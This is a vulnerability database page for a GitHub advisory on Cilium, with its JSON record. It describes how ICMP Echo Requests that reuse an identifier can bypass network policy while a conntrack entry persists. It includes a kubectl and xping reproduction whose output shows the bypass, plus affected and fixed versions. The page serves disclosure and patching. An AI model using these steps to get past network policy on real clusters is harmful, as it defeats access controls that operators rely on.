GHSA-C66W-HQ56-4Q97

Vulnerability from github – Published: 2021-05-21 14:32 – Updated: 2021-05-21 14:09
VLAI?
Summary
Network policy may be bypassed by some ICMP Echo Requests
Details

Impact

Under certain conditions, ICMP Echo Request sent to a Cilium endpoint from an actor may bypass a network policy which disallows access from the actor to the endpoint, but allows from the endpoint to the actor. This does NOT apply to UDP and TCP traffic.

The actor is either a pod or a cluster host or a remote host.

The following conditions must be met: 1. Network policies have been created which: a) do not allow access from the actor to the endpoint; b) allow access from the endpoint to the actor and does not specify neither protocol nor port. 2. The endpoint has sent ICMP Echo Request to the actor with the ICMP identifier X. 3. The actor sends ICMP Echo Request to the endpoint with the same ICMP identifier X. 4. The request from the actor (3.) is sent before the Cilium's conntrack GC has removed the previously created conntrack entry (2.).

Detailed description

See https://github.com/cilium/cilium/commit/dfb008a9099c4da1e0fd964c899c43ee13280b0e (v1.9.x), https://github.com/cilium/cilium/commit/ff6ebae6efca1bd991302b464dea428512823e79 (v1.8.x), https://github.com/cilium/cilium/commit/472bbeff75161979c317ab21d563f826291b5f37 (v1.7.x).

Example

$ kubectl run server --image=quay.io/cilium/net-test:v1.0.0 --restart=Never -- sleep 3600
$ kubectl run client --image=quay.io/cilium/net-test:v1.0.0 --restart=Never -- sleep 3600
$ cat <<EOF | kubectl apply -f
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: server-netpol # allow client->server
spec:
  podSelector:
    matchLabels:
      run: server
  ingress:
  - from:
    - podSelector:
        matchLabels:
          run: client
  policyTypes:
  - Ingress
---
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: client-netpol # deny any->client
spec:
  podSelector:
    matchLabels:
      run: client
  policyTypes:
  - Ingress
EOF

$ kubectl exec -ti server -- xping -c1 -x666 $CLIENT_POD_IP
PING 10.154.0.50 (10.154.0.50): 56 data bytes
^C
--- 10.154.0.50 ping statistics ---
1 packets transmitted, 0 packets received, 100% packet loss   <--- "client-netpol" policy denied
command terminated with exit code 1

$ kubectl exec -ti client -- xping -c1 -x666 $SERVER_POD_IP
PING 10.154.1.16 (10.154.1.16): 56 data bytes
64 bytes from 10.154.1.16: seq=0 ttl=60 time=0.822 ms

--- 10.154.1.16 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss   <--- "server-netpol" policy allowed
round-trip min/avg/max = 0.822/0.822/0.822 ms

$ kubectl exec -ti server -- xping -c1 -x666 $CLIENT_POD_IP
PING 10.154.0.50 (10.154.0.50): 56 data bytes
64 bytes from 10.154.0.50: seq=0 ttl=60 time=0.527 ms

--- 10.154.0.50 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss   <--- "client-netpol" policy bypassed
round-trip min/avg/max = 0.527/0.527/0.527 ms

For more information

If you have any questions or comments about this advisory:

Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.7.14"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/cilium/cilium"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.7.8"
            },
            {
              "fixed": "1.7.15"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.8.7"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/cilium/cilium"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.8.3"
            },
            {
              "fixed": "1.8.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.9.4"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/cilium/cilium"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.9.0"
            },
            {
              "fixed": "1.9.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [],
    "github_reviewed": true,
    "github_reviewed_at": "2021-05-21T14:09:14Z",
    "nvd_published_at": null,
    "severity": "LOW"
  },
  "details": "## Impact\n\nUnder certain conditions, ICMP Echo Request sent to a Cilium endpoint from an actor may bypass a network policy which _disallows_ access from the actor to the endpoint, but _allows_ from the endpoint to the actor. This does _NOT_ apply to UDP and TCP traffic.\n\nThe actor is either a pod or a cluster host or a remote host.\n\nThe following conditions must be met:\n1. Network policies have been created which:\n  a) do not allow access from the actor to the endpoint;\n  b) allow access from the endpoint to the actor and does not specify neither protocol nor port. \n2. The endpoint has sent ICMP Echo Request to the actor with the ICMP identifier X.\n3. The actor sends ICMP Echo Request to the endpoint with the same ICMP identifier X.\n4. The request from the actor (3.) is sent before the Cilium\u0027s conntrack GC has removed the previously created conntrack entry (2.).\n\n## Detailed description\n\nSee https://github.com/cilium/cilium/commit/dfb008a9099c4da1e0fd964c899c43ee13280b0e (v1.9.x), https://github.com/cilium/cilium/commit/ff6ebae6efca1bd991302b464dea428512823e79 (v1.8.x), https://github.com/cilium/cilium/commit/472bbeff75161979c317ab21d563f826291b5f37 (v1.7.x).\n\n## Example\n\n```\n$ kubectl run server --image=quay.io/cilium/net-test:v1.0.0 --restart=Never -- sleep 3600\n$ kubectl run client --image=quay.io/cilium/net-test:v1.0.0 --restart=Never -- sleep 3600\n$ cat \u003c\u003cEOF | kubectl apply -f\napiVersion: networking.k8s.io/v1\nkind: NetworkPolicy\nmetadata:\n  name: server-netpol # allow client-\u003eserver\nspec:\n  podSelector:\n    matchLabels:\n      run: server\n  ingress:\n  - from:\n    - podSelector:\n        matchLabels:\n          run: client\n  policyTypes:\n  - Ingress\n---\napiVersion: networking.k8s.io/v1\nkind: NetworkPolicy\nmetadata:\n  name: client-netpol # deny any-\u003eclient\nspec:\n  podSelector:\n    matchLabels:\n      run: client\n  policyTypes:\n  - Ingress\nEOF\n\n$ kubectl exec -ti server -- xping -c1 -x666 $CLIENT_POD_IP\nPING 10.154.0.50 (10.154.0.50): 56 data bytes\n^C\n--- 10.154.0.50 ping statistics ---\n1 packets transmitted, 0 packets received, 100% packet loss   \u003c--- \"client-netpol\" policy denied\ncommand terminated with exit code 1\n\n$ kubectl exec -ti client -- xping -c1 -x666 $SERVER_POD_IP\nPING 10.154.1.16 (10.154.1.16): 56 data bytes\n64 bytes from 10.154.1.16: seq=0 ttl=60 time=0.822 ms\n\n--- 10.154.1.16 ping statistics ---\n1 packets transmitted, 1 packets received, 0% packet loss   \u003c--- \"server-netpol\" policy allowed\nround-trip min/avg/max = 0.822/0.822/0.822 ms\n\n$ kubectl exec -ti server -- xping -c1 -x666 $CLIENT_POD_IP\nPING 10.154.0.50 (10.154.0.50): 56 data bytes\n64 bytes from 10.154.0.50: seq=0 ttl=60 time=0.527 ms\n\n--- 10.154.0.50 ping statistics ---\n1 packets transmitted, 1 packets received, 0% packet loss   \u003c--- \"client-netpol\" policy bypassed\nround-trip min/avg/max = 0.527/0.527/0.527 ms\n```\n\n## For more information\n\nIf you have any questions or comments about this advisory:\n\n- Open an issue in [Cilium Issues](https://github.com/cilium/cilium/issues)\n- Email us at security@cilium.io",
  "id": "GHSA-c66w-hq56-4q97",
  "modified": "2021-05-21T14:09:14Z",
  "published": "2021-05-21T14:32:37Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/cilium/cilium/security/advisories/GHSA-c66w-hq56-4q97"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [],
  "summary": "Network policy may be bypassed by some ICMP Echo Requests"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.